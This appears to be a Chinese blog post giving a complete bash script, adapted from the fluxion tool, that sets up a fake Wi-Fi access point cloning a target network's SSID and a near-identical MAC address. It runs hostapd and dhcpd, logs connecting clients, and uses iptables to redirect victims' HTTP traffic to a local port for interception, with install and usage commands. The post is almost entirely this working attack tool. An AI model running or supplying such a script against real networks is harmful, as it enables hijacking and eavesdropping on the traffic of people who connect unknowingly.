前言
最近在研究WIFI流量劫持的相关工具,由于技术栈太浅,过程颇为痛苦😖,还是太菜了,有一部分是伪造wifi的过程,简化下放出来,基于fluxion工具修改的,需要有一个无线网卡,可以在某宝上花几十元买个
安装依赖
apt update && apt install -y hostapd isc-dhcp-server
hostapd 用来建立wifi热点, isc-dhcp-server 用来给连上伪造wifi的客户端分配ip和配置dns服务
代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
#!/usr/bin/env bash
OutputDevice=/dev/null
APServiceInterface="" # 提供wifi服务的网卡名字
CaptivePortalAccessInterface="" # 提供wifi服务的网卡名字
CaptivePortalAccessPointInterface="" # 提供wifi服务的网卡名字
CaptivePortalGatewayAddress="192.169.254.1" # 网关地址
TargetMAC="" # wifi mac地址
TargetSSID="" # wifi 名称
TargetChannel="" # wifi 频道
Wifipassword="" # wifi 密码
CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} # 根据网关地址计算出wifi分配的地址网络范围
IPTablesBackup="tmp/iptables-rules" # 用来存储iptables配置,当停止伪造wifi后恢复原状
# 从命令行解析参数
ARGS=`getopt -o e:m:c:p:i: --long essid:,mac:,channel:,password:,interface: -- "$@"`
if [ $? != 0 ] ; then echo "Terminating..." >&2 ; exit 1 ; fi
eval set -- "$ARGS"
while true;do
case "$1" in
-i|--interface)
APServiceInterface=$2
CaptivePortalAccessInterface=$2
CaptivePortalAccessPointInterface=$2
shift 2
;;
-e|--essid)
TargetSSID=$2
shift 2
;;
-m|--mc)
TargetMAC=$2
shift 2
;;
-c|--channel)
TargetChannel=$2
shift 2
;;
-p|--password)
Wifipassword=$2
shift 2
;;
--)
shift
break
;;
*)
echo "未知的参数选项:{$1}"
exit 1
;;
esac
done
# 捕捉control c 信号,当捕获后,停止伪造wifi,并恢复原状
trap 'stop_attack' SIGINT
# 开启ap服务前的一些配置工作,写入hostapd配置文件
ap_service_prep() {
if [ ${#@} -lt 5 ]; then return 1; fi
APServiceInterface=$1
APServiceInterfaceAddress=$2
APServiceSSID=$3
APServiceMAC=$4
APServiceChannel=$5
kill $APServicePID &> $OutputDevice
# Prepare the hostapd config file.
echo "\
interface=$APServiceInterface
driver=nl80211
ssid=$APServiceSSID
hw_mode=g
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=$Wifipassword
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
channel=$APServiceChannel" \
> "tmp/$APServiceMAC-hostapd.conf"
# Spoof virtual interface MAC address.
ip link set $APServiceInterface down
sleep 0.5
macchanger --mac=$APServiceMAC $APServiceInterface &> $OutputDevice
sleep 0.5
ip link set $APServiceInterface up
sleep 0.5
# HostAPD sets the virtual interface mode
# to master, which is supported by dhcpd.
APServiceAccessInterface=$APServiceInterface
}
# 设置攻击选项,写入dhcp配置文件
captive_portal_set_attack() {
local -r rogueMACHex=$(printf %02X $((0x${TargetMAC:13:1} + 1)))
TargetRogueMAC="${TargetMAC::13}${rogueMACHex:1:1}${TargetMAC:14:4}"
ap_service_prep \
"$CaptivePortalAccessPointInterface" \
"$CaptivePortalGatewayAddress" \
"$TargetSSID" \
"$TargetRogueMAC" \
"$TargetChannel"
CaptivePortalAccessInterface=$APServiceAccessInterface
# Generate the dhcpd configuration file, which is
# used to provide DHCP service to rogue AP clients.
echo "\
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $CaptivePortalGatewayNetwork.0 netmask 255.255.255.0 {
option broadcast-address $CaptivePortalGatewayNetwork.255;
option routers $CaptivePortalGatewayAddress;
option subnet-mask 255.255.255.0;
option domain-name-servers $CaptivePortalGatewayAddress,8.8.8.8,114.114.114.114;
range $CaptivePortalGatewayNetwork.100 $CaptivePortalGatewayNetwork.254;
}\
" >"tmp/dhcpd.conf"
# create an empty leases file
touch "tmp/dhcpd.leases"
}
# 恢复原有的iptables规则
captive_portal_unset_routes() {
if [ -f "$IPTablesBackup" ]; then
iptables-restore <"$IPTablesBackup" \
&> $OutputDevice
else
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
fi
# Restore system's original forwarding state
if [ -f "tmp/ip_forward" ]; then
sysctl -w net.ipv4.ip_forward=$(
cat "tmp/ip_forward"
) &> $OutputDevice
rm -rf "tmp/ip_forward"
fi
if [ -f "tmp/send_redirects" ]; then
sysctl -w net.ipv4.conf.all.send_redirects=$(
cat "tmp/send_redirects"
) &> $OutputDevice
rm -rf "tmp/send_redirects"
fi
ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null
}
# 设置iptables规则,当客户端连上伪造的wifi后,iptables把无线网卡的流量转发到本机上,以使客户端能正常上网
captive_portal_set_routes() {
# Give an address to the gateway interface in the rogue network.
# This makes the interface accessible from the rogue network.
ip addr add $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface
# Save the system's routing state to restore later.
cp "/proc/sys/net/ipv4/ip_forward" "tmp/ip_forward"
cp "/proc/sys/net/ipv4/conf/all/send_redirects" "tmp/send_redirects"
# Activate system IPV4 packet routing/forwarding.
sysctl -w net.ipv4.ip_forward=1 &>$OutputDevice
sysctl -w net.ipv4.conf.all.send_redirects=0 &>$OutputDevice
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -s $CaptivePortalGatewayNetwork/24 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A POSTROUTING -j MASQUERADE
}
# 停止攻击
stop_attack() {
rm -rf "tmp/clients.txt"
rm -rf "tmp/hosts"
rm -rf "tmp/iptables-rules"
rm -rf "tmp/dhcpd.leases"
rm -rf "tmp/dhcpd.leases~"
rm -rf "tmp/dhcpd.conf"
rm -rf "tmp/$APServiceMAC-hostapd.conf"
captive_portal_unset_routes
killall xterm &> $OutputDevice
killall hostapd &> $OutputDevice
}
# 开始攻击
start_attack() {
mkdir tmp
rfkill unblock all
captive_portal_set_attack
echo '设置攻击完毕'
sleep 2
iptables-save >"$IPTablesBackup"
xterm -bg "#000000" -fg "#FFFFFF" \
-title " AP Service [hostapd]" -e \
hostapd "tmp/$APServiceMAC-hostapd.conf" &
echo '开启ap服务完毕'
sleep 2
captive_portal_set_routes &
echo '设置路由完毕'
sleep 2
xterm -bg black -fg "#CCCC00" \
-title " AP DHCP Service" -e \
"dhcpd -d -f -lf \"tmp/dhcpd.leases\" -cf \"tmp/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"tmp/clients.txt\"" &
}
start_attack
sleep infinity &
wait
使用
./wifi.sh -i ‘wlan0’ -e ‘test’ -p ‘test123456’ -c ‘10’ -m ‘05:D2:B4:31:A7:28’
大功告成
